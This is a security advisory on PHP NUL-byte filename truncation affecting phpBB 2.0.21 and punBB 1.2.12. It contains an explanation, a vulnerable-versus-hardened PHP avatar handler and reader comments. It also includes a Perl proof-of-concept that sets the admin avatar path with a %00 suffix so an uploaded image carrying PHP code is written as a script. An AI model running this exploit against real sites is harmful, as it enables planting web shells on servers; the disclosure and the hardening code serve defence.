File operation functions of PHP do not function correctly when a NUL byte is used in the filename.
This NULL byte poisoning vulnerability affects a number of PHP applications; examples of vulnerable applications are phpBB and punBB.
Credit:
The original article can be found at: http://www.security.nnov.ru/Odocument221.html
Vulnerable Systems:
* phpBB version 2.0.21
* punBB version 1.2.12
When a NUL byte is used in a file name, some of PHP's file operation functions do not work correctly: the path is passed down to the C library, which treats the NUL byte as the end of the string, so everything after it is silently dropped.
For example:
copy('1.jpg', "./dir_for_upload/1.php\0"."/2.jpg");
or
copy('1.jpg', "./dir_for_upload/1.php/\0"."/2.jpg");
will copy 1.jpg to 1.php. The same happens with move_uploaded_file() and rename().
Another example:
unlink("./dir_for_upload/1.php\0"."/2.jpg");
will remove the file 1.php, whereas
unlink("./dir_for_upload/1.php/\0"."/2.jpg");
Warning: unlink(./dir_for_upload/1.php/) [function.unlink]: Not a directory
will not remove 1.php, because the truncated path ends in a slash and the operating system refuses to unlink it as a file.
This vulnerability can be used to upload or replace arbitrary files on the server, e.g. PHP scripts, by appending a "poison NULL" (%00) to the filename.
In the case of phpBB and punBB the vulnerability can be exploited by an administrator changing the location of the avatar directory and then uploading an avatar file that carries PHP code in its EXIF data. Note that the truncation itself is closed in PHP 5.3.4 and later, where the filesystem functions reject any path containing a NUL byte (CVE-2006-7243).
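As an added illustration (this is not code from the advisory, phpBB or punBB), the following sketches an avatar upload handler of the shape described above, with the vulnerable path construction beside a hardened version, plus a small helper showing what the C library actually sees once the NUL byte cuts the path. The function names, the $avatar_path setting, the images/avatars base directory and the $file array (one $_FILES entry) are assumptions made for this example.

```php
<?php
// Added example, not code from the advisory, phpBB or punBB.
// Assumed for illustration: the $avatar_path setting, the "images/avatars"
// base directory, and $file in the shape of one $_FILES entry.

// What the C library underneath copy(), rename(), move_uploaded_file() and
// unlink() sees on affected PHP versions (before 5.3.4): the path ends at
// the first NUL byte. "1.php\0/2.jpg" therefore becomes "1.php", and
// "1.php/\0/2.jpg" becomes "1.php/", which explains the two unlink() results.
function c_visible_path(string $path): string
{
    $nul = strpos($path, "\0");
    return $nul === false ? $path : substr($path, 0, $nul);
}

// Vulnerable shape: the administrator-controlled directory setting is
// concatenated with a server-chosen name and passed straight to
// move_uploaded_file(). With $avatar_path = "images/avatars/shell.php\0"
// the destination seen by the OS is images/avatars/shell.php, and the
// uploaded JPEG, PHP code in its EXIF block included, is written there.
function store_avatar_vulnerable(string $avatar_path, int $user_id, array $file): string
{
    $dest = $avatar_path . '/' . $user_id . '.jpg';
    move_uploaded_file($file['tmp_name'], $dest);
    return $dest;
}

// Hardened shape.
function store_avatar_hardened(string $avatar_path, int $user_id, array $file): string
{
    // 1. Reject NUL bytes and other control characters outright instead of
    //    relying on the filesystem functions to notice them.
    if (preg_match('/[\x00-\x1f\x7f]/', $avatar_path) === 1) {
        throw new InvalidArgumentException('avatar path contains control characters');
    }

    // 2. Resolve the configured directory and require it to stay inside the
    //    fixed avatar base; realpath() also fails for a path that does not exist.
    $base = realpath(__DIR__ . '/images/avatars');
    $dir  = realpath($avatar_path);
    if ($base === false || $dir === false || strpos($dir . '/', $base . '/') !== 0) {
        throw new RuntimeException('avatar path is not inside the avatar directory');
    }

    // 3. Derive the extension from the file's content, never from a name.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $extensions = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
    if (!is_string($mime) || !isset($extensions[$mime])) {
        throw new RuntimeException('upload is not a supported image');
    }
    $ext = $extensions[$mime];

    // 4. Re-encode the image with GD so that EXIF data and any trailing
    //    bytes, which is where the advisory's PHP payload lives, are discarded.
    $img = imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('image could not be decoded');
    }
    $dest = $dir . '/' . $user_id . '.' . $ext;
    if ($ext === 'png') {
        $ok = imagepng($img, $dest);
    } elseif ($ext === 'gif') {
        $ok = imagegif($img, $dest);
    } else {
        $ok = imagejpeg($img, $dest);
    }
    if (!$ok) {
        throw new RuntimeException('could not write avatar');
    }
    return $dest;
}
```

Step 1 is the direct fix for the NUL byte, but step 4 is what actually defeats the EXIF payload: even if a poisoned path slipped through, a re-encoded image no longer contains the attacker's bytes. On PHP 5.3.4 and later the filesystem functions refuse NUL-containing paths on their own, but a configuration value that decides where uploads land should still be validated before it reaches them.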
Proof of concept:
#!/usr/bin/perl -w
# Proof of concept for phpBB 2.0.21: log in as a board administrator and set
# the avatar directory to "<target file>%00". The NUL byte makes PHP's file
# functions write the next uploaded avatar to the target name, e.g. shell.php.
use strict;
use HTTP::Cookies;
use LWP;

unless (@ARGV) {
    die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n";
}
my ($host, $user, $pass, $avatar_path, $debug) = @ARGV;

my $ua = LWP::UserAgent->new(agent => 'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar(HTTP::Cookies->new());

# POST an application/x-www-form-urlencoded body to $url and return the response
sub post_form {
    my ($url, $data) = @_;
    my $req = HTTP::Request->new('POST', $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($data);
    return $ua->request($req);
}

# 1. Normal forum login; the session cookie is kept in the cookie jar
my $login_url = 'http://' . $host . '/login.php';
my $res = post_form($login_url, "username=$user&password=$pass&login=1");

# 2. Fetch login.php again and pull the session id (sid) out of the page;
#    the administration panel requires it as a query parameter
$res = $ua->get($login_url);
my $content = $res->content;
print $content if $debug;
my ($sid) = $content =~ m/true&sid=([^"]+)"/;
die "could not find sid in login page (wrong credentials?)\n" unless defined $sid;

# 3. Re-authenticate for the administration panel (admin=1)
$res = post_form($login_url, "username=$user&password=$pass&login=1&admin=1");

# 4. Save the board configuration with avatar_path = "<target>%00". PHP's
#    file functions truncate the path at the NUL byte, so the next avatar
#    upload is written to the target file name
my $admin_url = 'http://' . $host . '/admin/admin_board.php?sid=' . $sid;
$res = post_form($admin_url, "submit=submit&allow_avatar_local=1&avatar_path=${avatar_path}%00");
print $res->content if $debug;
Subject: null byte poisoning
Date: 12 Sep. 2006
From: achtung

Is it a joke? This kind of attack has been well known for years and years. I don't know what you're trying to do, get fame I suppose, but it is pathetic :)
Subject: Why not report them
Date: 27 Sep. 2006
From: Sunny

If these attacks still work, why not report them? They should be fixed in the PHP engine, pronto.